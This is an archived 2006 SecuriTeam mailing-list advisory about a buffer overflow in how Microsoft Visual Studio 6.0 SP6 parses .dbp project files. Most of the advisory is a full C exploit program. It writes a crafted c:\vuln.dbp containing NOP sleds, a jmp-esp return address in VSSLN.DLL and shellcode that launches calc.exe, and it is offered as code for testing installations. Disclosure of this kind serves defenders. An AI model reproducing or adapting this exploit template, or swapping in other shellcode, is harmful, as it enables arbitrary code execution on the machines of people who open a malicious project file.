[EXPL] Microsoft Visual Studio 6.0 SP6 Malformed .dbp (Exploit)

---

• From: SecuriTeam <support@xxxxxxxxxxxxxx>
• Date: 7 Mar 2006 19:25:38 +0200

---

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Microsoft Visual Studio 6.0 SP6 Malformed .dbp (Exploit)
------------------------------------------------------------------------


SUMMARY

Visual Studio contains an exploitable buffer overflow vulnerability
whenever it parsed dbp files, the following exploit code can be used to
test your installation for the vulnerability.

DETAILS

Vulnerable Systems:
* Microsoft Visual Studio 6.0 (with latest Service Pack 6)
* Microsoft Development Environment 6.0 (SP6) (Microsoft Visual InterDev
6.0)

Exploit:
/*********************************

Microsoft Visual Studio 6.0 Sp6 Malformed .dbp File BoF Exploit by Kozan

Bug Discovered and Exploit Coded by: Kozan
Credits to ATmaCA
Web: www.spyinstructors.com
Mail: kozan@xxxxxxxxxxxxxxxxxx

Affected Vendor:

Microsoft (www.microsoft.com)


Affected Products:

Microsoft Visual Studio 6.0 (with latest Service Pack 6)
Microsoft Development Environment 6.0 (SP6) (Microsoft Visual InterDev
6.0)


Vulnerability Details:

A Buffer Overflow Vulnerability is exists for the following file formats
of affected product.


Visual Studio Database Project File (.dbp)
Visual Studio Solution (.sln)

Original Advisory and Technical Details:

*********************************/

#include <windows.h>
#include <stdio.h>


char szHeaderBlock[] =
"\x23\x20\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x20\x44\x65\x76\x65"
"\x6C\x6F\x70\x65\x72\x20\x53\x74\x75\x64\x69\x6F\x20\x50\x72\x6F"
"\x6A\x65\x63\x74\x20\x46\x69\x6C\x65\x20\x2D\x20\x44\x61\x74\x61"
"\x62\x61\x73\x65\x20\x50\x72\x6F\x6A\x65\x63\x74\x0D\x0A\x42\x65"
"\x67\x69\x6E\x20\x44\x61\x74\x61\x50\x72\x6F\x6A\x65\x63\x74\x20"
"\x3D\x20\x22\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";


// 0x4656b8c3 - jmp esp - VSSLN.DLL

char szEip[] = "\xc3\xb8\x56\x46";


char szTrashCode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90";


// invoke calc.exe

char szShellCode[] =
"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xef"
"\x9b\xf0\xd8\x83\xeb\xfc\xe2\xf4\x13\x73\xb4\xd8\xef\x9b\x7b\x9d"
"\xd3\x10\x8c\xdd\x97\x9a\x1f\x53\xa0\x83\x7b\x87\xcf\x9a\x1b\x91"
"\x64\xaf\x7b\xd9\x01\xaa\x30\x41\x43\x1f\x30\xac\xe8\x5a\x3a\xd5"
"\xee\x59\x1b\x2c\xd4\xcf\xd4\xdc\x9a\x7e\x7b\x87\xcb\x9a\x1b\xbe"
"\x64\x97\xbb\x53\xb0\x87\xf1\x33\x64\x87\x7b\xd9\x04\x12\xac\xfc"
"\xeb\x58\xc1\x18\x8b\x10\xb0\xe8\x6a\x5b\x88\xd4\x64\xdb\xfc\x53"
"\x9f\x87\x5d\x53\x87\x93\x1b\xd1\x64\x1b\x40\xd8\xef\x9b\x7b\xb0"
"\xd3\xc4\xc1\x2e\x8f\xcd\x79\x20\x6c\x5b\x8b\x88\x87\xe5\x28\x3a"

"\x9c\xf3\x68\x26\x65\x95\xa7\x27\x08\xf8\x91\xb4\x8c\x9b\xf0\xd8";


char szTrashCode2[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";


char szFooterBlock[] = "\x22\x0D\x0A\x45\x6E\x64\x0D\x0A";


int main()
{
fprintf(stdout, "\r\n\r\n"

"--------------------------------------------------------------------------"
"\r\n"
"Microsoft Visual Studio 6.0 Sp6
Malformed .dbp File BoF Exploit by Kozan\n"
"Bug Discovered and Exploit Coded
by:Kozan\n"
"Credits to ATmaCA\n"
"www.spyinstructors.com -
kozan@xxxxxxxxxxxxxxxxxx\n"
"\r\n"

"--------------------------------------------------------------------------"
"\r\n\r\n"
);

int nBufLen = sizeof(szHeaderBlock) +
sizeof(szFooterBlock) +
sizeof(szTrashCode) +
sizeof(szTrashCode2) +
sizeof(szEip) +
sizeof(szShellCode) - 6;

char *pszFileBuf = (char*)malloc(nBufLen);

memset(pszFileBuf, 0x90, nBufLen);
memcpy(pszFileBuf, szHeaderBlock, sizeof(szHeaderBlock)-1);
memcpy(pszFileBuf+sizeof(szHeaderBlock)-1, szEip,
sizeof(szEip)-1);
memcpy(pszFileBuf+sizeof(szHeaderBlock)-1+ sizeof(szEip)-1,
szTrashCode, sizeof(szTrashCode)-1);
memcpy(pszFileBuf+sizeof(szHeaderBlock)-1+
sizeof(szEip)-1+sizeof(szTrashCode)-1, szShellCode,
sizeof(szShellCode)-1);
memcpy(pszFileBuf+sizeof(szHeaderBlock)-1+
sizeof(szEip)-1+sizeof(szTrashCode)-1+sizeof(szShellCode)-1, szTrashCode2,
sizeof(szTrashCode2)-1);
memcpy(pszFileBuf+sizeof(szHeaderBlock)-1+
sizeof(szEip)-1+sizeof(szTrashCode)-1+sizeof(szShellCode)-1+
sizeof(szTrashCode2)-1, szFooterBlock, sizeof(szFooterBlock)-1);

FILE *fp;
if( (fp = fopen("c:\\vuln.dbp","a+b")) == NULL )
{
fprintf( stderr, "[Error]\t: Can not create c:\\vuln.dbp
file!\r\n");
return -1;
}
fwrite(pszFileBuf, nBufLen, 1, fp);
fclose(fp);

fprintf( stdout, "[Completed]\t: c:\\vuln.dbp file created
successfuly. Open it to test...\r\n");

return 0;

}


ADDITIONAL INFORMATION

The information has been provided by <mailto:kozan@xxxxxxxxxxxxxxxxxx>
ATmaCA.
The original article can be found at:
<http://spyinstructors.com/show.php?name=Advisories&pa=showpage&pid=73>
http://spyinstructors.com/show.php?name=Advisories&pa=showpage&pid=73



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

---

• Prev by Date: [NEWS] Freeciv Resource Starvation
• Next by Date: [UNIX] phpBannerExchange Directory Traversal
• Previous by thread: [NEWS] Freeciv Resource Starvation
• Next by thread: [UNIX] phpBannerExchange Directory Traversal
• Index(es):
  • Date
  • Thread

---

Relevant Pages [NT] Visual Studio Buffer Overflow ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A Buffer Overflow Vulnerability exists with Visual Studio parsing of some ... malicious ".dbp" file is opened. ... A specially crafted project file can overwrite a stack based buffer ... (Securiteam) [NT] Visual Studio Code Execution (Exploit) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Visual Studio Code Execution ... Microsoft Visual Studio has been designed to execute part of the user ... If a user click on the solution file and the form1.cs is ... (Securiteam) [NT] Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability ... // Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability ... (Securiteam)

---

We are proud to have Web Hosting and Rack Housing from 9 Net Avenue Deutschland.
(15)